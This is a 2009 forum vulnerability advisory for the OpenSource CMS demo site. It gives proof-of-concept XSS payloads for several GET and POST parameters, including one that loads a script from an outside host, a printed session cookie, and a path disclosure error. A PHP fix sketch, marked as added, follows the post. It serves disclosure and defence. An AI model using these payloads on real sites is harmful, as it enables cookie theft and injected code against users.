CMS(?): OpenSource CMS Multiple Vulnerabilities

Posted by Lix 

June 22, 2009 06:33PM

    _              _            _   ____                       _ _
   / \   _ __ _ __(_)_   ____ _| | / ___|  ___  ___ _   _ _ __(_) |_ _   _
  / _ \ | '__| '__| \ \ / / _` | | \___ \ / _ \/ __| | | | '__| | __| | | |
 / ___ \| |  | |  | |\ V / (_| | |  ___) |  __/ (__| |_| | |  | | |_| |_| |
/_/   \_\_|  |_|  |_| \_/ \__,_|_| |____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                                                     |___/

+-----------------------------------------------------------------------------+
Author: Lix
Blog: https://arrivalsec.wordpress.com
Writer: http://0verl0ad.blogspot.com
Contact: Lix.security@gmail.com

Date of report: 17/6/2009
CMS: OpenSource CMS

+-----------------------------------------------------------------------------+

------++++=########################## Advisory & Vulnerabilities Information ##########################=++++------

Type: Web App Vuln
Details: 4 XSS & 1 FPD
Risk: Medium/High
Advisory ID: ASec-101
Disclosure policy: RFpolicy

------++++=########################## ################################ ##########################=++++------

[+]XSS

1º [------XSS------]

Location: index.php
Method: GET
Url: http://php.opensourcecms.com/search/index.php?q=

PoC - Cookie Alert

http://php.opensourcecms.com/search/index.php?q="><script>alert(document.cookie);</script>

[Response]:

PHPSESSID=bf2c97c8e104e8724ec728249fb87cb6; OAID=ccb31a401923eb6600a415d1e3e329d2; OAVARS[55cb872]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22oadest%22%3Bs%3A26%3A%22http%3A%2F%2Fwww.tmdhosting.com%2F%22%3B%7D; __utma=231256798.103564284.1245349628.1245349628.1245349628.1; __utmb=231256798.57.10.1245349628; __utmc=231256798; __utmz=231256798.1245349629.1.1.utmcsr=opensourcecms.com|utmccn=(referral)|utmcmd=referral|utmcct=/

2º [------XSS------]

Location: register.php
Method: POST
Url: http://php.opensourcecms.com/register.php

PoC - Post Parameters (I use Tamper Data to change the POST parameters)

website="><script>alert(0);</script>
name ="><script>alert(1);</script>
email="><script>alert(2);</script>
..........

3º [------XSS------]

Location: contactus.php
Method: POST
Url: http://php.opensourcecms.com/general/contactus.php

PoC - Post Parameters (I use Tamper Data to change the POST parameters)

name="><script src="http://seth.oxyhost.com/descargas/js.js"></script>
email="> other evil code

4º [------XSS------]

Location: details.php
Method: POST
Url: http://php.opensourcecms.com/scripts/details.php?scriptid=[any id]&name=[name of script]

PoC - Post Parameters [in comments of the script] (I use Tamper Data to change the POST parameters)

name="><script>alert('XSS');</script>

[+]FPD

1º [------FPD------]

Location: show.php
Method: POST
Url: http://php.opensourcecms.com/scripts/show.php?catid=[x category]&cat=[name of category]

PoC - Post Parameters (I use Tamper Data to change the POST parameters)

sortby= some special char (';/;";\ etc...)

[Response]:

Notice: Undefined offset: 1 in /home/opencms/public_html/php/scripts/show.php on line 27

Fatal error: Call to a member function bind_param() on a non-object in /home/opencms/include/classes/Scripts.inc.php on line 262

I found it on the php.opensourcecms demo site, but the whole network is affected. It seems they fixed everything, but badly: they put in a filter that is easily bypassed using a jsref event. I will contact them again.

The truth is that I am surprised it is not fully fixed, because they replied very properly.


---------------------------------------


[Arrival Security]
[0verl0ad in the Net]




Edited 5 time(s). Last edit at 06/22/2009 07:06PM by Lix.
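An added example, not part of Lix's post and not OpenSource CMS code: a PHP sketch of the defensive side of the two bug classes reported above, encoding at output instead of filtering input (the post notes the vendor's filter was bypassable) and keeping the failure behind the `sortby` full path disclosure out of the response. Function names, the table and the column names are assumptions made for illustration.

```php
<?php
// Added example: hypothetical handlers, not OpenSource CMS code.
declare(strict_types=1);

// FPD: never render notices or fatals to the client; log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// XSS: encode for the HTML attribute context at output time rather than
// blacklisting strings on input. ENT_QUOTES encodes both quote types, so
// a value starting with "> cannot close the attribute it is placed in.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_search_box(string $q): string
{
    return '<input type="text" name="q" value="' . attr($q) . '">';
}

// FPD: map sortby onto a fixed allowlist so unexpected characters never
// reach the SQL text (column names are assumptions for this sketch).
function resolve_sort_column(string $sortby): string
{
    $allowed = ['name' => 'name', 'date' => 'created_at', 'rating' => 'rating'];
    return $allowed[$sortby] ?? 'name';
}

// FPD: the reported fatal ("bind_param() on a non-object") is consistent
// with using the result of a failed prepare() without checking it.
function list_scripts(mysqli $db, int $catId, string $sortby): array
{
    $sql = 'SELECT id, name FROM scripts WHERE cat_id = ? ORDER BY '
         . resolve_sort_column($sortby);
    try {
        $stmt = $db->prepare($sql);
    } catch (mysqli_sql_exception $e) { // default report mode since PHP 8.1
        $stmt = false;
    }
    if ($stmt === false) {
        error_log('list_scripts: prepare failed');
        return [];
    }
    $stmt->bind_param('i', $catId);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Constructed input with the same shape as the first PoC in the post.
echo render_search_box('"><script>alert(document.cookie);</script>'), PHP_EOL;
```

The same `attr()` call applies to every field the post lists (`website`, `name`, `email`, comment `name`) wherever those values are written back into attributes; values placed in other contexts such as inline script or URLs need the encoder for that context.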